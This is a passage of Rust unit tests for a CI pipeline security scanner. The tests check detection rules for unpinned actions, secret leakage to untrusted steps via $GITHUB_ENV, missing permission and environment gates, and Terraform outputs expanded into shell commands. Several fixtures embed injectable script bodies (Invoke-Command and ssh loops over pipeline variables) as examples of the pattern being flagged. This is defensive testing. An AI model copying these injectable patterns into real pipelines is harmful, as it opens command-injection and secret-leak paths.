9224        let findings = unpinned_action(&g);
9225        assert_eq!(findings.len(), 1);
9226        assert_eq!(findings[0].severity, Severity::Medium);
9227        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9228    }
9229
9230    #[test]
9231    fn unpinned_action_same_repo_composite_is_info() {
9232        // `./.github/actions/setup` — same-repo composite action. No
9233        // external supply-chain surface, so the rule emits Info as a
9234        // hygiene-only signal rather than a security finding.
9235        let mut g = AuthorityGraph::new(source("ci.yml"));
9236        g.add_node(
9237            NodeKind::Image,
9238            "./.github/actions/setup",
9239            TrustZone::FirstParty,
9240        );
9241
9242        let findings = unpinned_action(&g);
9243        assert_eq!(findings.len(), 1);
9244        assert_eq!(findings[0].severity, Severity::Info);
9245        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9246    }
9247
9248    #[test]
9249    fn unpinned_action_unknown_owner_is_high() {
9250        // `random-org/foo@v1` — unknown owner, full unbounded supply-chain
9251        // surface. This is the case the rule was originally designed for
9252        // and the only severity tier that still emits at High.
9253        let mut g = AuthorityGraph::new(source("ci.yml"));
9254        g.add_node(NodeKind::Image, "random-org/foo@v1", TrustZone::Untrusted);
9255
9256        let findings = unpinned_action(&g);
9257        assert_eq!(findings.len(), 1);
9258        assert_eq!(findings[0].severity, Severity::High);
9259        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9260    }
9261
9262    #[test]
9263    fn unpinned_action_self_hosted_runner_label_not_flagged() {
9264        // Self-hosted runner labels are FirstParty Image nodes too — but
9265        // they aren't action references and have no @version to pin. The
9266        // rule must skip them (META_SELF_HOSTED is the marker).
9267        let mut g = AuthorityGraph::new(source("ci.yml"));
9268        let mut meta = std::collections::HashMap::new();
9269        meta.insert(META_SELF_HOSTED.into(), "true".into());
9270        g.add_node_with_metadata(NodeKind::Image, "self-hosted", TrustZone::FirstParty, meta);
9271
9272        let findings = unpinned_action(&g);
9273        assert!(
9274            findings.is_empty(),
9275            "self-hosted runner labels must not be flagged as unpinned actions: {findings:#?}"
9276        );
9277    }
9278
9279    // ── authority_propagation clustering ─────────────────────────
9280
9281    #[test]
9282    fn authority_propagation_clusters_one_secret_to_three_sinks() {
9283        // One secret, three different untrusted sinks reached via separate
9284        // propagation paths. After clustering, the rule must emit ONE
9285        // finding listing all three sinks in `nodes_involved`.
9286        let mut g = AuthorityGraph::new(source("ci.yml"));
9287        let secret = g.add_node(NodeKind::Secret, "GITHUB_TOKEN", TrustZone::FirstParty);
9288        let trampoline = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
9289        let sink_a = g.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
9290        let sink_b = g.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);
9291        let sink_c = g.add_node(NodeKind::Step, "deploy[2]", TrustZone::Untrusted);
9292        g.add_edge(trampoline, secret, EdgeKind::HasAccessTo);
9293        g.add_edge(trampoline, sink_a, EdgeKind::DelegatesTo);
9294        g.add_edge(trampoline, sink_b, EdgeKind::DelegatesTo);
9295        g.add_edge(trampoline, sink_c, EdgeKind::DelegatesTo);
9296
9297        let findings = authority_propagation(&g, 4);
9298        assert_eq!(
9299            findings.len(),
9300            1,
9301            "three propagation paths from one secret must collapse to one finding, got: {findings:#?}"
9302        );
9303        let f = &findings[0];
9304        assert_eq!(f.category, FindingCategory::AuthorityPropagation);
9305        assert_eq!(f.severity, Severity::Critical);
9306        // [source, sink_a, sink_b, sink_c] — order preserved by insertion.
9307        assert_eq!(f.nodes_involved.len(), 4);
9308        assert_eq!(f.nodes_involved[0], secret);
9309        assert!(f.nodes_involved.contains(&sink_a));
9310        assert!(f.nodes_involved.contains(&sink_b));
9311        assert!(f.nodes_involved.contains(&sink_c));
9312        assert!(
9313            f.message.contains("3 sinks")
9314                || f.message.contains("deploy[0]") && f.message.contains("deploy[2]"),
9315            "cluster message must mention the multiple sinks: {}",
9316            f.message
9317        );
9318    }
9319
9320    #[test]
9321    fn authority_propagation_does_not_cluster_separate_secrets() {
9322        // Three independent secrets, each reaching one sink. The clustering
9323        // is keyed on the source node, so each secret's path becomes its own
9324        // finding — three findings total, not one.
9325        let mut g = AuthorityGraph::new(source("ci.yml"));
9326        let s1 = g.add_node(NodeKind::Secret, "TOKEN_A", TrustZone::FirstParty);
9327        let s2 = g.add_node(NodeKind::Secret, "TOKEN_B", TrustZone::FirstParty);
9328        let s3 = g.add_node(NodeKind::Secret, "TOKEN_C", TrustZone::FirstParty);
9329        let step1 = g.add_node(NodeKind::Step, "step_a", TrustZone::FirstParty);
9330        let step2 = g.add_node(NodeKind::Step, "step_b", TrustZone::FirstParty);
9331        let step3 = g.add_node(NodeKind::Step, "step_c", TrustZone::FirstParty);
9332        let sink1 = g.add_node(NodeKind::Step, "sink_a", TrustZone::Untrusted);
9333        let sink2 = g.add_node(NodeKind::Step, "sink_b", TrustZone::Untrusted);
9334        let sink3 = g.add_node(NodeKind::Step, "sink_c", TrustZone::Untrusted);
9335        g.add_edge(step1, s1, EdgeKind::HasAccessTo);
9336        g.add_edge(step1, sink1, EdgeKind::DelegatesTo);
9337        g.add_edge(step2, s2, EdgeKind::HasAccessTo);
9338        g.add_edge(step2, sink2, EdgeKind::DelegatesTo);
9339        g.add_edge(step3, s3, EdgeKind::HasAccessTo);
9340        g.add_edge(step3, sink3, EdgeKind::DelegatesTo);
9341
9342        let findings = authority_propagation(&g, 4);
9343        assert_eq!(
9344            findings.len(),
9345            3,
9346            "one finding per distinct source secret, got: {findings:#?}"
9347        );
9348        let sources: std::collections::HashSet<_> =
9349            findings.iter().map(|f| f.nodes_involved[0]).collect();
9350        assert!(sources.contains(&s1));
9351        assert!(sources.contains(&s2));
9352        assert!(sources.contains(&s3));
9353    }
9354
9355    // ── secret_via_env_gate_to_untrusted_consumer ──────────────────────
9356
9357    /// Build a graph with one job containing a configurable sequence of
9358    /// steps. Each tuple is (name, trust_zone, writes_env_gate, reads_env,
9359    /// secret_to_link). Returns the graph plus the assigned NodeIds in
9360    /// declaration order so tests can assert on specific nodes.
9361    fn job_with_steps(
9362        job: &str,
9363        steps: &[(&str, TrustZone, bool, bool, Option<&str>)],
9364    ) -> (AuthorityGraph, Vec<NodeId>) {
9365        let mut g = AuthorityGraph::new(source("ci.yml"));
9366        let mut secret_ids: std::collections::HashMap<String, NodeId> =
9367            std::collections::HashMap::new();
9368        let mut step_ids = Vec::new();
9369        for (name, zone, writes, reads, secret) in steps {
9370            let mut meta = std::collections::HashMap::new();
9371            meta.insert(META_JOB_NAME.into(), job.into());
9372            if *writes {
9373                meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
9374            }
9375            if *reads {
9376                meta.insert(META_READS_ENV.into(), "true".into());
9377            }
9378            let id = g.add_node_with_metadata(NodeKind::Step, *name, *zone, meta);
9379            if let Some(sname) = secret {
9380                let secret_id = *secret_ids
9381                    .entry((*sname).to_string())
9382                    .or_insert_with(|| g.add_node(NodeKind::Secret, *sname, TrustZone::FirstParty));
9383                g.add_edge(id, secret_id, EdgeKind::HasAccessTo);
9384            }
9385            step_ids.push(id);
9386        }
9387        (g, step_ids)
9388    }
9389
9390    #[test]
9391    fn env_gate_writer_then_untrusted_reader_fires() {
9392        let (g, _ids) = job_with_steps(
9393            "build",
9394            &[
9395                (
9396                    "setup",
9397                    TrustZone::FirstParty,
9398                    true,
9399                    false,
9400                    Some("CLOUD_KEY"),
9401                ),
9402                ("deploy", TrustZone::Untrusted, false, true, None),
9403            ],
9404        );
9405        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9406        assert_eq!(findings.len(), 1, "writer + untrusted reader must fire");
9407        assert_eq!(findings[0].severity, Severity::Critical);
9408        assert!(
9409            findings[0].message.contains("CLOUD_KEY"),
9410            "message must name the laundered secret"
9411        );
9412        assert!(
9413            findings[0].message.contains("deploy"),
9414            "message must name the consumer step"
9415        );
9416    }
9417
9418    #[test]
9419    fn env_gate_writer_then_first_party_reader_does_not_fire() {
9420        // First-party consumer is the legitimate use of $GITHUB_ENV — the
9421        // entire point of the gate. Only flagged when the consumer's trust
9422        // zone is reduced.
9423        let (g, _) = job_with_steps(
9424            "build",
9425            &[
9426                (
9427                    "setup",
9428                    TrustZone::FirstParty,
9429                    true,
9430                    false,
9431                    Some("CLOUD_KEY"),
9432                ),
9433                ("use-it", TrustZone::FirstParty, false, true, None),
9434            ],
9435        );
9436        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9437        assert!(
9438            findings.is_empty(),
9439            "first-party reader is the intended use; must not fire"
9440        );
9441    }
9442
9443    #[test]
9444    fn env_gate_write_of_non_secret_value_does_not_fire() {
9445        // Writer step doesn't hold any Secret/Identity — it's writing a
9446        // benign value (build version, config flag) into the env. Out of
9447        // scope: the env gate isn't laundering authority across a trust
9448        // boundary because there's no authority to launder.
9449        let (g, _) = job_with_steps(
9450            "build",
9451            &[
9452                ("setup", TrustZone::FirstParty, true, false, None),
9453                ("deploy", TrustZone::Untrusted, false, true, None),
9454            ],
9455        );
9456        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9457        assert!(
9458            findings.is_empty(),
9459            "env-gate write of non-authority value must not fire"
9460        );
9461    }
9462
9463    #[test]
9464    fn writer_in_different_job_does_not_fire() {
9465        // The env gate only propagates within a job — a writer in job A
9466        // cannot reach a consumer in job B even if both jobs run on the
9467        // same runner. Same-job constraint enforced via META_JOB_NAME.
9468        let mut g = AuthorityGraph::new(source("ci.yml"));
9469        let secret = g.add_node(NodeKind::Secret, "CLOUD_KEY", TrustZone::FirstParty);
9470
9471        let mut writer_meta = std::collections::HashMap::new();
9472        writer_meta.insert(META_JOB_NAME.into(), "build".into());
9473        writer_meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
9474        let writer =
9475            g.add_node_with_metadata(NodeKind::Step, "setup", TrustZone::FirstParty, writer_meta);
9476        g.add_edge(writer, secret, EdgeKind::HasAccessTo);
9477
9478        let mut consumer_meta = std::collections::HashMap::new();
9479        consumer_meta.insert(META_JOB_NAME.into(), "deploy".into()); // DIFFERENT job
9480        consumer_meta.insert(META_READS_ENV.into(), "true".into());
9481        g.add_node_with_metadata(
9482            NodeKind::Step,
9483            "remote-deploy",
9484            TrustZone::Untrusted,
9485            consumer_meta,
9486        );
9487
9488        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9489        assert!(
9490            findings.is_empty(),
9491            "cross-job writer/consumer pair must not fire — same-job constraint"
9492        );
9493    }
9494
9495    #[test]
9496    fn writer_after_consumer_in_same_job_does_not_fire() {
9497        // Declaration order matters: a writer that comes AFTER the
9498        // consumer can't have populated the env the consumer read. Without
9499        // this ordering check the rule would over-fire on any same-job
9500        // write/read pair.
9501        let (g, _) = job_with_steps(
9502            "build",
9503            &[
9504                ("deploy", TrustZone::Untrusted, false, true, None),
9505                (
9506                    "setup",
9507                    TrustZone::FirstParty,
9508                    true,
9509                    false,
9510                    Some("CLOUD_KEY"),
9511                ),
9512            ],
9513        );
9514        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9515        assert!(
9516            findings.is_empty(),
9517            "writer that runs after the consumer cannot launder into it"
9518        );
9519    }
9520
9521    #[test]
9522    fn third_party_consumer_also_fires() {
9523        // ThirdParty (SHA-pinned marketplace action) is still in scope —
9524        // the action's code is immutable but it can still receive and
9525        // exfiltrate the laundered secret.
9526        let (g, _) = job_with_steps(
9527            "build",
9528            &[
9529                (
9530                    "setup",
9531                    TrustZone::FirstParty,
9532                    true,
9533                    false,
9534                    Some("CLOUD_KEY"),
9535                ),
9536                (
9537                    "third-party-deploy",
9538                    TrustZone::ThirdParty,
9539                    false,
9540                    true,
9541                    None,
9542                ),
9543            ],
9544        );
9545        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9546        assert_eq!(findings.len(), 1);
9547    }
9548
9549    #[test]
9550    fn rule_appears_in_run_all_rules() {
9551        // run_all_rules wires every rule in the catalogue — assert the
9552        // new one is hooked up so it actually fires from the CLI scan path.
9553        let (g, _) = job_with_steps(
9554            "build",
9555            &[
9556                (
9557                    "setup",
9558                    TrustZone::FirstParty,
9559                    true,
9560                    false,
9561                    Some("CLOUD_KEY"),
9562                ),
9563                ("deploy", TrustZone::Untrusted, false, true, None),
9564            ],
9565        );
9566        let findings = run_all_rules(&g, 4);
9567        assert!(
9568            findings
9569                .iter()
9570                .any(|f| f.category == FindingCategory::SecretViaEnvGateToUntrustedConsumer),
9571            "secret_via_env_gate_to_untrusted_consumer must run via run_all_rules"
9572        );
9573    }
9574
9575    // ── no_workflow_level_permissions_block ──────────────────
9576
9577    fn graph_with_platform(platform: &str, file: &str) -> AuthorityGraph {
9578        let mut g = AuthorityGraph::new(source(file));
9579        g.metadata.insert(META_PLATFORM.into(), platform.into());
9580        g
9581    }
9582
9583    #[test]
9584    fn no_workflow_perms_fires_on_gha_when_marker_present_and_no_token_identity() {
9585        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9586        g.metadata
9587            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9588        // A real workflow always has at least one Step. The empty-graph
9589        // guard inside the rule excludes mis-classified variable-only YAML.
9590        g.add_node(NodeKind::Step, "build[0]", TrustZone::FirstParty);
9591        // No GITHUB_TOKEN identity nodes at all (parser would skip creating
9592        // them when there's no permissions block anywhere).
9593
9594        let findings = no_workflow_level_permissions_block(&g);
9595        assert_eq!(findings.len(), 1);
9596        assert_eq!(findings[0].severity, Severity::Medium);
9597        assert_eq!(
9598            findings[0].category,
9599            FindingCategory::NoWorkflowLevelPermissionsBlock
9600        );
9601    }
9602
9603    #[test]
9604    fn no_workflow_perms_does_not_fire_on_empty_graph() {
9605        // Empty graph (variable-only YAML mis-detected as GHA, parse
9606        // failure, etc.) has no real authority surface — must skip.
9607        let mut g = graph_with_platform("github-actions", "vars.yml");
9608        g.metadata
9609            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9610        assert!(no_workflow_level_permissions_block(&g).is_empty());
9611    }
9612
9613    #[test]
9614    fn no_workflow_perms_does_not_fire_when_a_job_declares_permissions() {
9615        // Workflow has no top-level permissions, but one job does — the rule
9616        // must not fire because the per-job override is what runs.
9617        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9618        g.metadata
9619            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9620        let mut meta = std::collections::HashMap::new();
9621        meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
9622        meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
9623        g.add_node_with_metadata(
9624            NodeKind::Identity,
9625            "GITHUB_TOKEN (build)",
9626            TrustZone::FirstParty,
9627            meta,
9628        );
9629
9630        let findings = no_workflow_level_permissions_block(&g);
9631        assert!(findings.is_empty());
9632    }
9633
9634    #[test]
9635    fn no_workflow_perms_does_not_fire_on_ado_or_gitlab() {
9636        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9637        g.metadata
9638            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9639        assert!(no_workflow_level_permissions_block(&g).is_empty());
9640
9641        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9642        g.metadata
9643            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9644        assert!(no_workflow_level_permissions_block(&g).is_empty());
9645    }
9646
9647    // ── prod_deploy_job_no_environment_gate ───────────────────
9648
9649    #[test]
9650    fn prod_deploy_no_env_gate_fires_on_ado_prod_sc_without_env_marker() {
9651        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9652        step_with_meta(
9653            &mut g,
9654            "AzureCLI : Deploy",
9655            &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
9656        );
9657        let findings = prod_deploy_job_no_environment_gate(&g);
9658        assert_eq!(findings.len(), 1);
9659        assert_eq!(findings[0].severity, Severity::High);
9660        assert_eq!(
9661            findings[0].category,
9662            FindingCategory::ProdDeployJobNoEnvironmentGate
9663        );
9664        assert!(findings[0].message.contains("platform-prod-sc"));
9665    }
9666
9667    #[test]
9668    fn prod_deploy_no_env_gate_skips_when_env_marker_present() {
9669        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9670        step_with_meta(
9671            &mut g,
9672            "AzureCLI : Deploy",
9673            &[
9674                (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
9675                (META_ENV_APPROVAL, "true"),
9676            ],
9677        );
9678        assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
9679    }
9680
9681    #[test]
9682    fn prod_deploy_no_env_gate_skips_dev_connection() {
9683        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9684        step_with_meta(
9685            &mut g,
9686            "AzureCLI : Deploy",
9687            &[(META_SERVICE_CONNECTION_NAME, "platform-dev-sc")],
9688        );
9689        assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
9690    }
9691
9692    #[test]
9693    fn prod_deploy_no_env_gate_via_edge_to_prod_identity() {
9694        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9695        let step = step_with_meta(&mut g, "AzureCLI : Deploy", &[]);
9696        let mut id_meta = std::collections::HashMap::new();
9697        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
9698        let conn = g.add_node_with_metadata(
9699            NodeKind::Identity,
9700            "alz-infra-sc-prd-uks",
9701            TrustZone::FirstParty,
9702            id_meta,
9703        );
9704        g.add_edge(step, conn, EdgeKind::HasAccessTo);
9705        let findings = prod_deploy_job_no_environment_gate(&g);
9706        assert_eq!(findings.len(), 1);
9707        assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
9708    }
9709
9710    // ── long_lived_secret_without_oidc_recommendation ─────────
9711
9712    #[test]
9713    fn ll_secret_without_oidc_emits_for_aws_secret_with_no_oidc_in_graph() {
9714        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9715        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
9716
9717        let findings = long_lived_secret_without_oidc_recommendation(&g);
9718        assert_eq!(findings.len(), 1);
9719        assert_eq!(findings[0].severity, Severity::Info);
9720        assert!(matches!(
9721            findings[0].recommendation,
9722            Recommendation::FederateIdentity { .. }
9723        ));
9724    }
9725
9726    #[test]
9727    fn ll_secret_without_oidc_skips_when_oidc_identity_present() {
9728        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9729        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
9730        let mut meta = std::collections::HashMap::new();
9731        meta.insert(META_OIDC.into(), "true".into());
9732        g.add_node_with_metadata(
9733            NodeKind::Identity,
9734            "AWS/deploy-role",
9735            TrustZone::FirstParty,
9736            meta,
9737        );
9738
9739        assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
9740    }
9741
9742    #[test]
9743    fn ll_secret_without_oidc_skips_unrecognised_secret_names() {
9744        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9745        g.add_node(NodeKind::Secret, "INTERNAL_KEY", TrustZone::FirstParty);
9746        // Not AWS/GCP/Azure-shaped — no actionable OIDC migration path.
9747        assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
9748    }
9749
9750    // ── pull_request_workflow_inconsistent_fork_check ─────────
9751
9752    #[test]
9753    fn inconsistent_fork_check_fires_when_one_job_guarded_one_unguarded() {
9754        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9755        g.metadata
9756            .insert(META_TRIGGER.into(), "pull_request".into());
9757        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9758        let s_guarded = step_with_meta(
9759            &mut g,
9760            "build[0]",
9761            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9762        );
9763        let s_unguarded = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9764        g.add_edge(s_guarded, secret, EdgeKind::HasAccessTo);
9765        g.add_edge(s_unguarded, secret, EdgeKind::HasAccessTo);
9766
9767        let findings = pull_request_workflow_inconsistent_fork_check(&g);
9768        assert_eq!(findings.len(), 1);
9769        assert_eq!(
9770            findings[0].category,
9771            FindingCategory::PullRequestWorkflowInconsistentForkCheck
9772        );
9773        assert!(findings[0].message.contains("deploy"));
9774        assert!(findings[0].message.contains("build"));
9775    }
9776
9777    #[test]
9778    fn inconsistent_fork_check_skips_when_all_jobs_guarded() {
9779        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9780        g.metadata
9781            .insert(META_TRIGGER.into(), "pull_request".into());
9782        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9783        let s1 = step_with_meta(
9784            &mut g,
9785            "build[0]",
9786            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9787        );
9788        let s2 = step_with_meta(
9789            &mut g,
9790            "deploy[0]",
9791            &[(META_JOB_NAME, "deploy"), (META_FORK_CHECK, "true")],
9792        );
9793        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9794        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9795        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9796    }
9797
9798    #[test]
9799    fn inconsistent_fork_check_skips_when_no_job_guarded() {
9800        // Both unguarded → not "inconsistent" (the org never tried). Other
9801        // rules cover the underlying risk.
9802        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9803        g.metadata
9804            .insert(META_TRIGGER.into(), "pull_request".into());
9805        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9806        let s1 = step_with_meta(&mut g, "build[0]", &[(META_JOB_NAME, "build")]);
9807        let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9808        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9809        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9810        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9811    }
9812
9813    // ── terraform_output_via_setvariable_shell_expansion ─────
9814
9815    /// Helper: add a Step node tagged with the given job and an inline
9816    /// script body. Returns the node id so the caller can wire it up.
9817    fn add_script_step_in_job(g: &mut AuthorityGraph, name: &str, job: &str, body: &str) -> NodeId {
9818        let mut meta = std::collections::HashMap::new();
9819        meta.insert(META_SCRIPT_BODY.into(), body.into());
9820        meta.insert(META_JOB_NAME.into(), job.into());
9821        g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, meta)
9822    }
9823
9824    #[test]
9825    fn tf_output_setvariable_fires_on_solarwinds_corpus_pattern() {
9826        // Faithful reproduction of the
9827        // `Azure_Landing_Zone/sharedservice-solarwinds/.pipeline/deployment.yml`
9828        // pattern (lines ~98-180 of the corpus exemplar): a PowerShell@2
9829        // step reads `$env:TF_OUT_GDSVMS` and emits
9830        // `##vso[task.setvariable variable=gdsvms]`. A later
9831        // AzurePowerShell@5 step does `"$(gdsvms)" -split ","` followed by
9832        // `Invoke-Command` against each VM in the list.
9833        let mut g = AuthorityGraph::new(source("ado.yml"));
9834        add_script_step_in_job(
9835            &mut g,
9836            "capture-tf-outputs",
9837            "Deployment_Apply",
9838            "Write-Host \"TF_OUT_GDSVMS: $env:TF_OUT_GDSVMS\"\n\
9839             Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"\n\
9840             Write-Host \"##vso[task.setvariable variable=amlinvms]$env:TF_OUT_AMLINVMS\"",
9841        );
9842        add_script_step_in_job(
9843            &mut g,
9844            "join-vms-to-domain",
9845            "Deployment_Apply",
9846            "$GDSvmNames = \"$(gdsvms)\" -split \",\"\n\
9847             foreach ($vmName in $GDSvmNames) {\n\
9848               Invoke-Command -ComputerName $vmName -ScriptBlock { Add-Computer }\n\
9849             }",
9850        );
9851
9852        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9853        // Two captured variables (gdsvms, amlinvms) but only `gdsvms` is
9854        // referenced in the sink — exactly one finding.
9855        assert_eq!(findings.len(), 1, "got: {findings:#?}");
9856        assert_eq!(findings[0].severity, Severity::High);
9857        assert_eq!(
9858            findings[0].category,
9859            FindingCategory::TerraformOutputViaSetvariableShellExpansion
9860        );
9861        assert!(findings[0].message.contains("gdsvms"));
9862        assert!(findings[0].nodes_involved.len() == 2);
9863    }
9864
9865    #[test]
9866    fn tf_output_setvariable_fires_on_literal_terraform_output_cli() {
9867        // Variant: the capture step actually shells out to
9868        // `terraform output -raw vm_names` instead of going through the
9869        // `TF_OUT_*` env-var convention. Sink uses bash -c "$(NAME)".
9870        let mut g = AuthorityGraph::new(source("ado.yml"));
9871        add_script_step_in_job(
9872            &mut g,
9873            "tf-capture",
9874            "deploy",
9875            "VMS=$(terraform output -raw vm_names)\n\
9876             echo \"##vso[task.setvariable variable=vms;]$VMS\"",
9877        );
9878        add_script_step_in_job(
9879            &mut g,
9880            "tf-consume",
9881            "deploy",
9882            "bash -c \"for vm in $(vms); do ssh $vm uptime; done\"",
9883        );
9884
9885        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9886        assert_eq!(findings.len(), 1, "got: {findings:#?}");
9887        assert!(findings[0].message.contains("vms"));
9888    }
9889
9890    #[test]
9891    fn tf_output_setvariable_skips_when_only_phase_one_present() {
9892        // Capture step exists, but no later step in the same job ever
9893        // references the captured variable in shell-expansion position.
9894        let mut g = AuthorityGraph::new(source("ado.yml"));
9895        add_script_step_in_job(
9896            &mut g,
9897            "capture",
9898            "deploy",
9899            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
9900        );
9901        add_script_step_in_job(
9902            &mut g,
9903            "innocuous-print",
9904            "deploy",
9905            "Write-Host 'Deployment complete.'",
9906        );
9907
9908        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9909        assert!(
9910            findings.is_empty(),
9911            "phase-1-only must not fire; got: {findings:#?}"
9912        );
9913    }
9914
9915    #[test]
9916    fn tf_output_setvariable_skips_when_only_phase_two_present() {
9917        // Sink step uses $(gdsvms) in shell-expansion position, but no
9918        // earlier step in the same job ever captured a terraform output
9919        // and emitted a setvariable for that name. Variable might be
9920        // defined elsewhere (variable group, vars yaml) — out of scope.
9921        let mut g = AuthorityGraph::new(source("ado.yml"));
9922        add_script_step_in_job(&mut g, "noop-first", "deploy", "echo 'starting deploy'");
9923        add_script_step_in_job(
9924            &mut g,
9925            "consume-only",
9926            "deploy",
9927            "$names = \"$(gdsvms)\" -split \",\"\n\
9928             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
9929        );
9930
9931        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9932        assert!(
9933            findings.is_empty(),
9934            "phase-2-only must not fire; got: {findings:#?}"
9935        );
9936    }
9937
9938    #[test]
9939    fn inconsistent_fork_check_skips_non_pr_trigger() {
9940        let mut g = graph_with_platform("github-actions", ".github/workflows/push.yml");
9941        g.metadata.insert(META_TRIGGER.into(), "push".into());
9942        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9943        let s1 = step_with_meta(
9944            &mut g,
9945            "build[0]",
9946            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9947        );
9948        let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9949        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9950        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9951        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9952    }
9953
9954    // ── gitlab_deploy_job_missing_protected_branch_only ────────
9955
9956    #[test]
9957    fn gitlab_deploy_no_protected_only_fires_on_prod_env_without_marker() {
9958        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9959        step_with_meta(&mut g, "deploy-prod", &[("environment_name", "production")]);
9960        let findings = gitlab_deploy_job_missing_protected_branch_only(&g);
9961        assert_eq!(findings.len(), 1);
9962        assert_eq!(findings[0].severity, Severity::Medium);
9963        assert_eq!(
9964            findings[0].category,
9965            FindingCategory::GitlabDeployJobMissingProtectedBranchOnly
9966        );
9967    }
9968
9969    #[test]
9970    fn gitlab_deploy_no_protected_only_skips_when_marker_present() {
9971        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9972        step_with_meta(
9973            &mut g,
9974            "deploy-prod",
9975            &[
9976                ("environment_name", "production"),
9977                (META_RULES_PROTECTED_ONLY, "true"),
9978            ],
9979        );
9980        assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
9981    }
9982
9983    #[test]
9984    fn gitlab_deploy_no_protected_only_skips_dev_environment() {
9985        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9986        step_with_meta(&mut g, "deploy-staging", &[("environment_name", "staging")]);
9987        assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
9988    }
9989
9990    // ── compensating-control suppressions ─────────────────────
9991
9992    #[test]
9993    fn suppression_checkout_pr_downgraded_when_no_privileged_steps_in_job() {
9994        // Build a graph where checkout_self_pr_exposure would fire BUT the
9995        // job has no secret access and no env-gate writes.
9996        let mut g = graph_with_platform("github-actions", ".github/workflows/lint.yml");
9997        g.metadata
9998            .insert(META_TRIGGER.into(), "pull_request_target".into());
9999        let _checkout = step_with_meta(
10000            &mut g,
10001            "lint[0]",
10002            &[(META_JOB_NAME, "lint"), (META_CHECKOUT_SELF, "true")],
10003        );
10004        // A second non-privileged step in the same job.
10005        step_with_meta(&mut g, "lint[1]", &[(META_JOB_NAME, "lint")]);
10006
10007        let mut findings = checkout_self_pr_exposure(&g);
10008        assert_eq!(findings.len(), 1);
10009        assert_eq!(findings[0].severity, Severity::High); // pre-suppression
10010        apply_compensating_controls(&g, &mut findings);
10011        assert_eq!(
